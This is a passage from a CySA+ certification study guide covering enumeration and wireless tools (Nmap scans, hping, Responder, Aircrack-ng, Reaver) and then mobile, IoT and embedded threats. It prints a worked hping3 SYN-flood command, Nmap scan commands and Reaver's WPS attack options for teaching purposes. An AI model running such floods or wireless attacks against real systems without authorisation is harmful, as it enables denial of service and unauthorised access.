those chapters can also be used to locate security issues
with in-house software.
Fuzzing
Fuzz testing, or fuzzing, involves injecting invalid or
unexpected input (sometimes called faults) into an
application to test how the application reacts. It is
usually done with a software tool that automates the
process. Inputs can include environment variables,
keyboard and mouse events, and sequences of API calls.
Figure 4-6 shows the logic of the fuzzing process.
Figure 4-6 Fuzz Testing
Two types of fuzzing can be used to identify susceptibility
to a fault injection attack:
• Mutation fuzzing: Involves changing the
existing input values (blindly)
• Generation-based fuzzing: Involves
generating the inputs from scratch, based on the
specification/format
The following measures can help prevent fault injection
attacks:
• Implement fuzz testing to help identify problems.
• Adhere to safe coding and project management
practices.
• Deploy application-level firewalls.
ENUMERATION
Enumeration is the process of discovering and listing
information. Network enumeration is the process of
discovering pieces of information that might be helpful
in a network attack or compromise. There are several
techniques used to perform enumeration and several
tools that make the process easier for both testers and
attackers. Let’s take a look at these techniques and tools.
Nmap
While network scanning can be done with more blunt
tools, like ping, Nmap is stealthier and may be able to
perform its activities without setting off firewalls and
IDSs. It is valuable to note that while we are discussing
Nmap in the context of network scanning, this tool can
be used for many other operations, including performing
certain attacks. When used for scanning, it typically
locates the devices, locates the open ports on the devices,
and determines the OS on each host.
After performing Nmap scans with certain flags set in the
scan packets, security analysts (and hackers) can make
certain assumptions based on the responses received.
These flags are used to control the TCP connection
process and so are present only in those packets. Figure
4-7 show a TCP header with the important flags circled.
Normally flags are “turned on” as a result of the normal
TCP process, but a hacker can craft packets to check the
flags he wants to check.
Figure 4-7 TCP Header
Figure 4-7 shows these flags, among others:
• URG: Urgent pointer field significant
• ACK: Acknowledgment field significant
• PSH: Push function
• RST: Reset the connection
• SYN: Synchronize sequence numbers
• FIN: No more data from sender
After performing Nmap scans with certain flags set in the
scan packets, security analysts (and hackers) can make
certain assumptions based on the responses received.
Nmap exploits weaknesses with three scan types:
• Null scan: A Null scan is a series of TCP packets
that contain a sequence number of 0 and no set
flags. Because the Null scan does not contain any
set flags, it can sometimes penetrate firewalls and
edge routers that filter incoming packets with
particular flags. When such a packet is sent, two
responses are possible:
• No response: The port is open on the target.
• RST: The port is closed on the target.
Figure 4-8 shows the result of a Null scan using the
command nmap -sN. In this case, nmap received no
response but was unable to determine whether that was
because a firewall was blocking the port or the port was
closed on the target. Therefore, it is listed as
open|filtered.
Figure 4-8 Null Scan
• FIN scan: This type of scan sets the FIN bit.
When this packet is sent, two responses are
possible:
• No response: The port is open on the target.
• RST/ACK: The port is closed on the target.
Example 4-1 shows sample output of a FIN scan using
the command nmap -sF, with the -v included for
verbose output. Again, nmap received no response but
was unable to determine whether that was because a
firewall was blocking the port or the port was closed on
the target. Therefore, it is listed as open|filtered.
Example 4-1 FIN Scan Using nmap –sF
# nmap -sF -v 192.168.0.7
Starting nmap 3.81 at 2016-01-23 21:17 EDT
Initiating FIN Scan against 192.168.0.7 [1663
ports] at 21:17
The FIN Scan took 1.51s to scan 1663 total
ports.
Host 192.168.0.7 appears to be up ... good.
Interesting ports on 192.168.0.7:
(The 1654 ports scanned but not shown below
are in state: closed)
PORT
STATE
SERVICE
21/tcp
open|filtered ftp
22/tcp
open|filtered ssh
23/tcp
open|filtered telnet
79/tcp
open|filtered finger
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
514/tcp open|filtered shell
886/tcp open|filtered unknown
2049/tcp open|filtered nfs
MAC Address: 00:03:47:6D:28:D7 (Intel)
Nmap finished: 1 IP address (1 host up)
scanned in 2.276 seconds
Raw packets sent: 1674 (66.9KB)
| Rcvd: 1655 (76.1KB)
• XMAS scan: This type of scan sets the FIN, PSH,
and URG flags. When this packet is sent, two
responses are possible:
• No response: The port is open on the target.
• RST: The port is closed on the target.
Figure 4-9 shows the result of this scan, using the
command nmap -sX. In this case nmap received no
response but was unable to determine whether that was
because a firewall was blocking the port or the port was
closed on the target. Therefore, it is listed as
open|filtered.
Figure 4-9 XMAS Scan
Null, FIN, and XMAS scans all serve the same purpose,
to discover open ports and ports blocked by a firewall,
and differ only in the switch used. While there are many
more scan types and attacks that can be launched with
Nmap, these scan types are commonly used during
environmental reconnaissance testing to discover what
the hacker might discover and take steps to close any
gaps in security before the hacker gets there. For more
information on Nmap, see https://nmap.org/.
Host Scanning
Host scanning involves identifying the live hosts on a
network or in a domain namespace. Nmap and other
scanning tools (such as ScanLine and SuperScan) can be
used for this. Sometimes called a ping scan, a host scan
records responses to pings sent to every address in the
network. You can also combine a host scan with a port
scan by using the proper arguments to the command.
During environmental reconnaissance testing, you can
make use of these scanners to identify all live hosts. You
may discover hosts that shouldn’t be there. To execute
this scan from nmap, the command is nmap -sP
192.168.0.0-100, where 0-100 is the range of IP
addresses to be scanned in the 192.168.0.0 network.
Figure 4-10 shows an example of the output from this
command. This command’s output lists all devices that
are on. For each one, the MAC address is also listed.
Figure 4-10 Host Scan with Nmap
hping
hping (and the newer version, hping3) is a commandline-oriented TCP/IP packet assembler/analyzer that
goes beyond simple ICMP echo requests. It supports
TCP, UDP, ICMP, and RAW-IP protocols and also has a
traceroute mode. The following is a subset of the
operations possible with hping:
• Firewall testing
• Advanced port scanning
• Network testing, using different protocols, TOS,
fragmentation
• Manual path MTU discovery
• Advanced traceroute, under all the supported
protocols
• Remote OS fingerprinting
• Remote uptime guessing
• TCP/IP stacks auditing
What is significant about hping is that it can be used to
create or assemble packets. Attacker’s use packet
assembly tools to create packets that allow them to
mounts attacks. Testers can also use hping to create
malicious packets to assess the response of the network
defenses or to identify vulnerabilities that may exist.
A common attack is a DoS attack using what is called a
SYN flood. In this attack, the target is overwhelmed
with unanswered SYN/ACK packets. The device answers
each SYN packet with a SYN-ACK. Since devices reserve
memory for the expected response to the SYN-ACK
packet, and since the attacker never answers, the target
system eventually runs out of memory, making it
essentially a dead device. This scenario is shown in
Figure 4-11.
Figure 4-11 SYN Flood
Example 4-2 demonstrates how to deploy a SYN flood by
executing the hping command at the terminal.
Example 4-2 Deploying a SYN Flood with hping
$ sudo hping3 -i u1 -S -p 80 -c 10
192.168.1.1
HPING 192.168.1.1 (eth0 192.168.1.1): S set,
40 headers + 0 data bytes
--- 192.168.1.1 hping statistic --10 packets transmitted, 0 packets received,
100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
The command in Example 4-2 would send TCP SYN
packets to 192.168.1.1. Including sudo is necessary
because hping3 creates raw packets for the task. For
raw sockets/packets, root privilege is necessary on Linux.
The parts of the command and the meaning of each are
described as follows:
• S indicates SYN flag
• p 80 means target port 80
• i u1 means wait for 1 microsecond between each
packet
• 1c 10 means send 10 packets
Were this a true attack, you would expect to see many
more packets sent; however, you can see how this tool
can be used to assess the likelihood that such an attack
would succeed. For more information, see
https://tools.kali.org/information-gathering/hping3.
Active vs. Passive
Chapter 3, “Vulnerability Management Activities,”
covered active and passive scanning. The concept of
active and passive enumeration is similar. Active
enumeration is when you send packets of some sort to
the network and then assess responses. An example of
this would be using nmap to send crafted packets that
interrogate the accessibility of various ports (port scan).
Passive enumeration does not send packets of any
type but captures traffic and makes educated
assumptions from the traffic. An example is using a
packet capture utility (sniffer) to look for malicious
traffic on the network.
Responder
Link-Local Multicast Name Resolution (LLMNR) and
NetBIOS Name Service (NBT-NS) are Microsoft
Windows components that serve as alternate methods of
host identification. Responder is a tool that can be used
for a number of things, among them answering NBT and
LLMNR name requests. By doing this it poisons the
service so that the victims communicate with the
adversary-controlled system. Once the name system is
compromised, Responder captures hashes and
credentials that are sent to the system after the name
services have been poisoned.
Figure 4-12 shows that after the target was convinced to
talk to Responder, it was able to capture the hash sent
for authentication, which could then be used to attempt
to crack the password.
Figure 4-12 Capturing Authentication Hashes with
Responder
WIRELESS ASSESSMENT
TOOLS
To assess wireless networks for vulnerabilities, you need
tools that can use wireless antennas and sensors to
capture and examine the wireless traffic. As a security
professional tasked with identifying wireless
vulnerabilities, you must also be familiar with the tools
used to compromise wireless networks. Let’s discuss
some of these tools.
Aircrack-ng
Aircrack-ng is a set of command-line tools you can use
to sniff wireless networks, among other things. Installers
for this tool are available for both Linux and Windows. It
is important to ensure that your device’s wireless chipset
and driver support this tool.
Aircrack-ng focuses on these areas of Wi-Fi security:
• Monitoring: Packet capture and export of data to
text files for further processing by third-party
tools
• Attacking: Replay attacks, deauthentication, fake
access points, and others via packet injection
• Testing: Checking Wi-Fi cards and driver
capabilities (capture and injection)
• Cracking: WEP and WPA PSK (WPA1 and 2)
As you can see, capturing wireless traffic is a small part
of what this tool can do. The command for capturing is
airodump-ng.
Figure 4-13 shows Aircrack-ng being used to attempt to
crack an encryption key. It attempted 1514 keys before
locating the correct one. For more information on
Aircrack-ng, see https://www.aircrack-ng.org/.
Figure 4-13 Aircrack-ng
Reaver
Reaver is both a package of tools and a command-line
tool within the package called reaver that is used to
attack Wi-Fi Protected Setup (WPS). Example 4-3 shows
the reaver command and its arguments.
Example 4-3 Reaver: Wi-Fi Protected Setup Attack
Tool
root@kali:~# reaver -h
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network
Solutions, Craig Heffner
<cheffner@tacnetsol.com
Required Arguments:
-i, --interface=<wlan>
Name of
the monitor-mode interface to use
-b, --bssid=<mac>
BSSID of
the target AP
Optional Arguments:
-m, --mac=<mac>
MAC of the
host system
-e, --essid=<ssid>
ESSID of
the target AP
-c, --channel=<channel>
Set the
802.11 channel for the interface (implies -f)
-s, --session=<file>
Restore a
previous session file
-C, --exec=<command>
Execute
the supplied command upon successful pin
recovery
-f, --fixed
Disable
channel hopping
-5, --5ghz
Use 5GHz
802.11 channels
-v, --verbose
Display
non-critical warnings (-vv or -vvv for more)
-q, --quiet
Only
display critical messages
-h, --help
Show help
Advanced Options:
-p, --pin=<wps pin>
Use the
specified pin (may be arbitrary string or 4/8
digit WPS pin)
-d, --delay=<seconds>
Set the
delay between pin attempts [1]
-l, --lock-delay=<seconds>
Set the
time to wait if the AP locks WPS pin attempts
[60]
-g, --max-attempts=<num>
Quit after
num pin attempts
-x, --fail-wait=<seconds>
Set the
time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y>
Sleep for
y seconds every x pin attempts
-t, --timeout=<seconds>
Set the
receive timeout period [10]
-T, --m57-timeout=<seconds>
Set the
M5/M7 timeout period [0.40]
-A, --no-associate
Do not
associate with the AP (association must be
done by another application)
-N, --no-nacks
Do not
send NACK messages when out of order packets
are received
-S, --dh-small
Use small
DH keys to improve crack speed
-L, --ignore-locks
Ignore
locked state reported by the target AP
-E, --eap-terminate
Terminate
each WPS session with an EAP FAIL packet
-J, --timeout-is-nack
Treat
timeout as NACK (DIR-300/320)
-F, --ignore-fcs
Ignore
frame checksum errors
-w, --win7
Mimic a
Windows 7 registrar [False]
-K, --pixie-dust
Run
pixiedust attack
-Z
Run
pixiedust attack
Example:
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 vv
The Reaver package contains other tools as well.
Example 4-4 shows the arguments for the wash
command of the Wi-Fi Protected Setup Scan Tool. For
more information on Reaver, see
https://tools.kali.org/wireless-attacks/reaver.
Example 4-4 wash: Wi-Fi Protected Setup Scan Tool
root@kali:~# wash -h
Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network
Solutions, Craig Heffner
Required Arguments:
-i, --interface=<iface>
Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...]
packets from capture files
Optional Arguments:
-c, --channel=<num>
Channel to listen on [auto]
-n, --probes=<num>
Maximum number of probes to send to each
scan mode [15]
-F, --ignore-fcs
Ignore frame checksum errors
-2, --2ghz
2.4GHz 802.11 channels
-5, --5ghz
5GHz 802.11 channels
-s, --scan
scan mode
-u, --survey
survey mode [default]
-a, --all
all APs, even those without WPS
-j, --json
extended WPS info as json
-U, --utf8
UTF8 ESSID (does not sanitize ESSID,
dangerous)
-h, --help
help
Read
AP in
Use
Use
Use
Use
Show
print
Show
Show
Example:
wash -i wlan0mon
oclHashcat
oclHashcat is a general-purpose computing on
graphics processing units (GPGPU)-based multi-hash
cracker using a brute-force attack. All versions have now
been updated and are simply called hashcat. In GPGPU,
the graphics processor is tasked with running the
algorithms that crack the hashes. The cracking of a hash
is shown in Figure 4-14.
Figure 4-14 oclHashcat
CLOUD INFRASTRUCTURE
ASSESSMENT TOOLS
As moving assets to the cloud becomes the rule and not
the exception, identifying and mitigating vulnerabilities
in cloud environments steadily increase in importance.
There are several monitoring and attack tools with which
you should be familiar.
ScoutSuite
ScoutSuite is a data collection tool that allows you to
use what are called longitudinal survey panels to track
and monitor the cloud environment. It is open source
and utilizes APIs made available by the cloud provider.
The following cloud providers are currently
supported/planned:
• Amazon Web Services (AWS)
• Microsoft Azure
• Google Cloud Platform
• Alibaba Cloud (alpha)
• Oracle Cloud Infrastructure (alpha)
Prowler
AWS Security Best Practices Assessment, Auditing,
Hardening and Forensics Readiness Tool, also called
Prowler, allows you to run reports of various types.
These reports list gaps found between your practices and
best practices of AWS as stated in CIS Amazon Web
Services Foundations Benchmark 1.1.
Figure 4-15 shows partial sample report results. Notice
that the results are color coded to categorize any gaps
found.
Figure 4-15 Prowler
Pacu
Exploit frameworks are packages of tools that provide a
bed for creating and launching attacks of various types.
One of the more famous of these is Metasploit. Pacu is
an exploit framework used to assess and attack AWS
cloud environments. Using plug-in modules, it assists an
attacker in
• Enumeration
• Privilege escalation
• Data exfiltration
• Service exploitation
• Log manipulation
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 4-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 4-2 Key Topics in Chapter 4
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
web vulnerability scanners
synthetic transaction monitoring
real user monitoring (RUM)
Burp Suite
OWASP Zed Attack Proxy (ZAP)
Nikto
Arachni
Nessus Professional
OpenVAS
Qualys
software development life cycle (SDLC)
static code analysis
dynamic analysis
reverse engineering
fuzzing
enumeration
Nmap
Null scan
FIN scan
XMAS scan
host scanning
SYN flood
active enumeration
passive enumeration
Responder
Aircrack-ng
Reaver
oclHashcat
ScoutSuite
Prowler
Pacu
REVIEW QUESTIONS
1. The
___________________________________
_____________ produces an interception proxy
called ZAP.
2. Match the tool on the left with its definition on the
right.
3. List at least one of the advantages of the cloudbased approach to vulnerability scanning.
4. Arrange the following steps of the SDLC in the
proper order.
Gather requirements
Certify/accredit
Release/maintain
Design
Test/validate
Perform change management and configuration
management/replacement
Develop
Plan/initiate project
5. ________________________ analysis is done
without the code executing
6. List at least one form of static code review.
7. Match the type of code review on the left with its
definition on the right.
8. List at least one measure that can help prevent fault
injection attacks.
9. Match the following tools with their definitions.
10. List at least one of the cloud platforms supported by
ScoutSuite.
Chapter 5. Threats and
Vulnerabilities Associated
with Specialized
Technology
This chapter covers the following topics related
to Objective 1.5 (Explain the threats and
vulnerabilities associated with specialized
technology) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
• Mobile: Discusses threats specific to the mobile
environment
• Internet of Things (IoT): Covers threats
specific to the IoT
• Embedded: Describes threats specific to
embedded systems
• Real-time operating system (RTOS): Covers
threats specific to an RTOS
• System-on-Chip (SoC): Investigates threats
specific to an SoC
• Field programmable gate array (FPGA):
Covers threats specific to FPGAs
• Physical access control: Discusses threats
specific to physical access control systems
• Building automation systems: Covers threats
specific to building automation systems
• Vehicles and drones: Describes threats specific
to vehicles and drones
• Workflow and process automation
systems: Covers threats specific to workflow and
process automation systems
• Incident Command System (ICS): Discusses
the use of ICS
• Supervisory control and data acquisition
(SCADA): Covers systems that operate with
coded signals over communication channels to
provide control of remote equipment
In some cases, the technologies that we create and
develop to enhance our ability to control the
environment and to automate processes create security
issues. As we add functionality, we almost always
increase the attack surface. This chapter describes
specific issues that are unique to certain scenarios and
technologies.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these 12 self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 5-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 5-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a specification first used in
late 2001 that allows USB devices, such as tablets
and smartphones, to act as either a USB host or a
USB device?
a. USB pass-through
b. USB-OTG
c. Ready Boost
d. Lo Jack
2. Which of the following is not one of the five
categories of IoT deployments?
a. LAN base
b. Smart home
c. Wearables
d. Connected cars
3. Which of the following describes a piece of software
that is built into a larger piece of software and is in
charge of performing some specific function on
behalf of the larger system?
a. Proprietary
b. Legacy
c. Embedded
d. Linked
4. VxWorks 6.5 is an example of a(n)
_______________ system?
a. Modbus
b. embedded
c. RTOS
d. legacy
5. Which of the following is an example of a SoC that
manages all the radio functions in a network
interface?
a. Dual-core processor
b. Broadband processor
c. Baseband processor
d. Hyper-processor
6. An FPGA is an example of which of the following?
a. SoC
b. PLD
c. PGA
d. Hypervisor
7. Which of the following is a series of two doors with
a small room between them?
a. Turnstile
b. Bollard
c. Mantrap
d. Moat
8. Which of the following is an application, network,
and media access control (MAC) layer
communications service used in HVAC systems?
a. BACnet
b. Modbus
c. CAN bus
d. BAP
9. Which of the following is designed to allow vehicle
microcontrollers and devices to communicate with
each other’s applications without a host computer?
a. CAN bus
b. ZigBee
c. Modbus
d. BAP
10. Which of the following is a tool used to automate
network functions?
a. DMVPN
b. Puppet
c. Net DNA
d. Modbus
11. Which of the following provides guidance for how to
organize assets to respond to an incident (system
description) and processes to manage the response
through its successive stages (concept of
operations)?
a. ICS
b. DMVPN
c. IEE
d. IoT
12. Which of the following industrial control system
components connect to the sensors and convert
sensor data to digital data, including telemetry
hardware?
a. PLCs
b. RTUs
c. BUS link
d. Modbus
FOUNDATION TOPICS
MOBILE
In today’s world, seemingly everyone in the workplace
has at least one mobile device. But with the popularity of
mobile devices has come increasing security issues for
security professionals. The increasing use of mobile
devices combined with the fact that many of these
devices connect using public networks with little or no
security provides security professionals with unique
challenges.
Educating users on the risks related to mobile devices
and ensuring that they implement appropriate security
measures can help protect against threats involved with
these devices. Some of the guidelines that should be
provided to mobile device users include implementing a
device-locking PIN, using device encryption,
implementing GPS location, and implementing remote
wipe. Also, users should be cautioned on downloading
apps without ensuring that they are coming from a
reputable source. In recent years, mobile device
management (MDM) and mobile application
management (MAM) systems have become popular in
enterprises. They are implemented to ensure that an
organization can control mobile device settings,
applications, and other parameters when those devices
are attached to the enterprise network.
The threats presented by the introduction of personal
mobile devices (smartphones and tablets) to an
organization’s network include the following:
• Insecure web browsing
• Insecure Wi-Fi connectivity
• Lost or stolen devices holding company data
• Corrupt application downloads and installations
• Missing security patches
• Constant upgrading of personal devices
• Use of location services
While the most common types of corporate information
stored on personal devices are corporate emails and
company contact information, it is alarming to note that
some surveys show almost half of these devices also
contain customer data, network login credentials, and
corporate data accessed through business applications.
To address these issues and to meet the rising demand
by employees to bring personal devices into the
workplace and use them for both work and personal
purposes, many organizations are creating bring your
own device (BYOD) policies. As a security
professional, when supporting a BYOD initiative, you
should take into consideration that you probably have
more to fear from the carelessness of the users than you
do from hackers. Not only are they less than diligent in
maintaining security updates and patches on devices,
they buy new devices frequently to get the latest features.
These factors make it difficult to maintain control over
the security of the networks in which these devices are
allowed to operate.
Centralized mobile device management tools are
becoming the fastest-growing solution for both
organization-issued and personal mobile devices. Some
solutions leverage the messaging server’s management
capabilities, and others are third-party tools that can
manage multiple brands of devices. One example is
Systems Manager by Cisco that integrates with its Cisco
Meraki cloud services. Another example is the Apple
Configurator for iOS devices. One of the challenges with
implementing such a system is that not all personal
devices may support native encryption and/or the
management process.
Typically, centralized MDM tools handle organizationissued and personal mobile devices differently. For
organization-issued devices, a client application typically
manages the configuration and security of the entire
device. If the device is a personal device allowed through
a BYOD initiative, the application typically manages the
configuration and security of itself and its data only. The
application and its data are sandboxed from the other
applications and data. The result is that the
organization’s data is protected if the device is stolen,
while the privacy of the user’s data is also preserved.
In Chapter 9, “Software Assurance Best Practices,” you
will learn about best practices surrounding the use of
mobile devices. The sections that follow look at some
additional security challenges posed by mobile devices.
Unsigned Apps/System Apps
Unsigned applications represent code that cannot be
verified to be what it purports to be or to be free of
malware. While many unsigned applications present
absolutely no security issues, most enterprises wisely
chose to forbid their installation. MDM software and
security settings in the devices themselves can be used to
prevent this.
System apps are those that come preinstalled on the
device. While these apps probably present no security
issue, some of them run all the time, so it might be
beneficial to remove them to save space and to improve
performance. The organization also might decide that
removing some system apps is necessary to prevent
features in these apps that can disclose information
about the user or the device that could lead to a social
engineering attack. By following the instructions on the
vendor site, these apps can be removed.
Security Implications/Privacy
Concerns
Security issues are inherent in mobile devices. Many of
these vulnerabilities revolve around storage devices.
Let’s look at a few.
Data Storage
While protecting data on a mobile device is always a
good idea, in many cases an organization must comply
with an external standard regarding the minimum
protection provided to the data on the storage device.
For example, the Payment Card Industry Data
Security Standard (PCI DSS) enumerates
requirements that payment card industry players must
meet to secure and monitor their networks, protect
cardholder data, manage vulnerabilities, implement
strong access controls, and maintain security policies.
Various storage types share certain issues and present
issues unique to the type.
Nonremovable Storage
The storage that is built into the device might not suffer
all the vulnerabilities shared by other forms but is still
data at risk. One tool at our disposal with this form of
storage that is not available with others is the ability to
remotely wipe the data if the device is stolen. At any rate,
the data should be encrypted with AES 128/256-bit
encryption. Also, be sure to have a backup copy of the
data stored in a secure location.
Removable Storage
While removable storage may be desirable in that it may
not be stolen if the device is stolen, it still can be lost and
stolen itself. Removable storage of any type represents
one of the primary ways data exfiltration occurs. If
removable storage is in use, the data should be encrypted
with AES 128/256-bit encryption.
Transfer/Back Up Data to Uncontrolled Storage
In some cases users store sensitive data in cloud storage
that is outside the control of the organization, using sites
such as Dropbox. These storage providers have had their
share of data loss issues as well. Policies should address
and forbid this type of storage of data from mobile
devices.
USB OTG
USB On-The-Go (USB OTG) is a specification first
used in late 2001 that allows USB devices, such as tablets
and smartphones, to act as either a USB host or a USB
device. With respect to smartphones, USB OTG has been
used to hack around an iPhone security feature that
requires a valid iPhone username and password to use a
device after a factory reset. This feature is supplied to
prevent the use of a stolen smartphone that has been
reset to factory defaults, but it can be defeated with a
hack using USB OTG.
Device Loss/Theft
Of course, one the biggest threats to organizations is a
lost or stolen device containing irreplaceable or sensitive
data. Organizations should ensure that they can remotely
wipe the device when this occurs. Moreover, polices
should require that corporate data be backed up to a
server so that a remote wipe does not delete data that
only resides in the device.
Rooting/Jailbreaking
While rooting or jailbreaking a device enables the
user to remove some of the restrictions of the device, it
also presents security issues. Jailbreaking removes the
security restrictions on your iPhone or iPad. This means
apps are given access to the core functions of the device,
which normally requires the user consent. It also allows
the installation of apps not found in the Apple Store. One
of the reasons those apps are not in the Apple Store is
that they are either insecure or malware masquerading
as a legitimate app. Finally, a rooted or jailbroken device
receives no security updates, making it even more
vulnerable.
Push Notification Services
Push notification services allow unsolicited
messages to be sent by an application to a mobile device
even when the application is not open on the device.
Although these services can be handy, there are some
security best practices when developing these services for
your organization:
• Do not send company confidential data or
intellectual property in the message payload.
• Do not store your SSL certificate and list of device
tokens in your web-root.
• Be careful not to inadvertently expose APN
(Apple) certificates or device tokens.
Geotagging
Geotagging is the process of adding geographical
identification metadata to various media and is enabled
by default on many smartphones (to the surprise of some
users). In many cases, this location information can be
used to locate where images, video, websites, and SMS
messages originate. At the very least, this information
can be used to assemble a social engineering attack. This
information has been used in the past to reveal the
location of high-valued goods. In an extreme case, four
U.S. Army Apache helicopters were destroyed (on the
ground) by the enemy after they were able to pinpoint
the helicopters’ location through geotagged photos taken
by U.S. soldiers and posted on the Internet.
OEM/Carrier Android Fragmentation
Android fragmentation refers to the overwhelming
number of versions of Android that have been sold. The
primary issue is that many users are still running an
older version for which security patches are no longer
available. The fault is typically that of the phone
manufacturer for either maintaining use of an operating
system when a new one is available or by customizing the
OS (remember, Android is open source) so much that the
security patches are incompatible. Organizations should
consider these issues when choosing a phone
manufacturer.
Mobile Payment
One of the latest features of smartphones is the ability to
pay for items using the smartphone instead of a credit
card. There are various technologies used to make this
possible and they have attendant security issues. Let’s
look at how these technologies work.
NFC Enabled
A new security issue facing both merchants and
customers is the security of payment cards that use near
field communication (NFC), such Apple Pay and
Google Pay. NFC is a short-range type of wireless
transmission and is therefore difficult to capture.
Moreover, these transmissions are typically encrypted.
However, interception is still possible. In any case, some
steps can be taken to secure these payment mechanisms:
• Lock the mobile device. Devices must be turned on
or unlocked before they can read any NFC tags.
• Turn off NFC when not in use.
• For passive tags, use an RFID/NFC-blocking
device.
• Scan mobile devices for unwanted apps, spyware,
and other threats that may siphon information
from your payment apps.
Inductance Enabled
Inductance is the process used in NFC to transmit the
information from the smartphone to the reader. Coils
made of ferrite material uses electromagnetic induction
to transmit information. Therefore, an inductanceenabled device would be one that supports a mobile
payment system. While capturing these transmissions is
possible, the attacker must be very close.
Mobile Wallet
An alternative technology used in mobile payment
systems is the Mobile Wallet used by online companies
like PayPal, Amazon Payments, and Google Payt. In this
system, the user registers his card number and is issued
a PIN, which he uses to authorize payments. The PIN
identifies the user and the card and charges the card.
Peripheral-Enabled Payments (Credit Card
Reader)
Credit card readers that can read from a mobile phone at
close range are also becoming ubiquitous, especially with
merchants that operate in remote locations such as cabs,
food trucks, and flea markets. Figure 5-1 shows one such
device reading a card.
Figure 5-1 Peripheral-Enabled Payments (Credit
Card Reader)
USB
Since this connection uses bounded media, this may be
the safest way to make a connection. The only way a
malicious individual could make this kind of connection
will be to gain physical access to the mobile device. So
physical security is the main way to mitigate this.
Malware
Just like laptops and desktops, mobile devices are targets
of viruses and malware. Major antivirus vendors such as
McAfee and Kaspersky make antivirus and anti-malware
products for mobile devices that provide the same realtime protection that the similar products do for desktops.
The same guideline that applies to computers applies to
mobile devices: keep the antivirus/anti-malware product
up to date by setting the device to check for updates
whenever connected to the Internet.
Unauthorized Domain Bridging
Most smartphones can act as a wireless hotspot. When a
device that has been made a member of the domain and
then acts as a hotspot, it allows access to the
organizational network to anyone using the hotspot. This
is called unauthorized domain bridging and should be
forbidden. There is software that can prevent this. In
several embodiments, software operative on the network
allows activation of only a single communications
adapter while inactivating all other communications
adapters installed on each computer authorized to access
the network.
SMS/MMS/Messaging
Short Message Service (SMS) is a text messaging service
component of most telephone, World Wide Web, and
mobile telephony systems. Multimedia Messaging
Service (MMS) handles messages that include graphics
or videos. Both technologies present security challenges.
Because messages are sent in clear text, both are
susceptible to spoofing and spamming.
INTERNET OF THINGS (IOT)
The Internet of Things (IoT) refers to a system of
interrelated computing devices, mechanical and digital
machines, and objects that are provided with unique
identifiers and the ability to transfer data over a network
without requiring human-to-human or human-tocomputer interaction. The IoT has presented attackers
with a new medium through which to carry out an attack.
Often the developers of the IoT devices add the IoT
functionality without thoroughly considering the security
implications of such functionality or without building in
any security controls to protect the IoT devices.
Note
IoT is a term for all physical objects, or “things,” that are now embedded with
electronics, software, and network connectivity. Thanks to the IoT, these
objects—including automobiles, kitchen appliances, and heating and air
conditioning controllers—can collect and exchange data. Unfortunately,
engineers give most of these objects this ability just for convenience and
without any real consideration of the security impacts. When these objects are
then deployed, consumers do not think of security either. The result is
consumer convenience but also risk. As the IoT evolves, security professionals
must be increasingly involved in the IoT evolution to help ensure that security
controls are designed to protect these objects and the data they collect and
transmit.
IoT Examples
IoT deployments include a wide variety of devices, but
are broadly categorized into five groups:
• Smart home: Includes products that are used in
the home. They range from personal assistance
devices, such as Amazon Alexa, to HVAC
components, such as Nest thermostats. These
devices are designed for home management and
automation.
• Wearables: Includes products that are worn by
users. They range from watches, such as the Apple
Watch, to personal fitness devices, like the Fitbit.
• Smart cities: Includes devices that help resolve
traffic congestion issues and reduce noise, crime,
and pollution. They include smart energy, smart
transportation, smart data, smart infrastructure,
and smart mobility devices.
• Connected cars: Includes vehicles that include
Internet access and data sharing capabilities.
Technologies include GPS devices, OnStar, and
AT&T connected cars.
• Business automation: Includes devices that
automate HVAC, lighting, access control, and fire
detection for organizations.
Methods of Securing IoT Devices
Security professionals must understand the different
methods of securing IoT devices. The following are some
recommendations:
• Secure and centralize the access logs of IoT
devices.
• Use encrypted protocols to secure communication.
• Create secure password policies.
• Implement restrictive network communications
policies, and set up virtual LANs.
• Regularly update device firmware based on vendor
recommendations.
When selecting IoT devices, particularly those that are
implemented at the organizational level, security
professionals need to look into the following:
• Does the vendor design explicitly for privacy and
security?
• Does the vendor have a bug bounty program and
vulnerability reporting system?
• Does the device have manual overrides or special
functions for disconnected operations?
EMBEDDED SYSTEMS
An embedded system is a piece of software that is
built into a larger piece of software and is in charge of
performing some specific function on behalf of the larger
system. The embedded part of the solution might
address specific hardware communications and might
require drivers to talk between the larger system and
some specific hardware. Embedded systems control
many devices in common use today and include systems
embedded in cars, HVAC systems, security alarms, and
even lighting systems. Machine-to-machine (M2M)
communication, the IoT, and remotely controlled
industrial systems have increased the number of
connected devices and simultaneously made these
devices targets.
Because embedded systems are usually placed within
another device without input from a security
professional, security is not even built into the device. So
although allowing the device to communicate over the
Internet with a diagnostic system provides a great service
to the consumer, oftentimes the manufacturer has not
considered that a hacker can then reverse
communication and take over the device with the
embedded system. As of this writing, reports have
surfaced of individuals being able to take control of
vehicles using their embedded systems. Manufacturers
have released patches that address such issues, but not
all vehicle owners have applied or even know about the
patches. As M2M and IoT increase in popularity, security
professionals can expect to see a rise in incidents like
this. A security professional is expected to understand
the vulnerabilities these systems present and how to put
controls in place to reduce an organization’s risk.
REAL-TIME OPERATING
SYSTEM (RTOS)
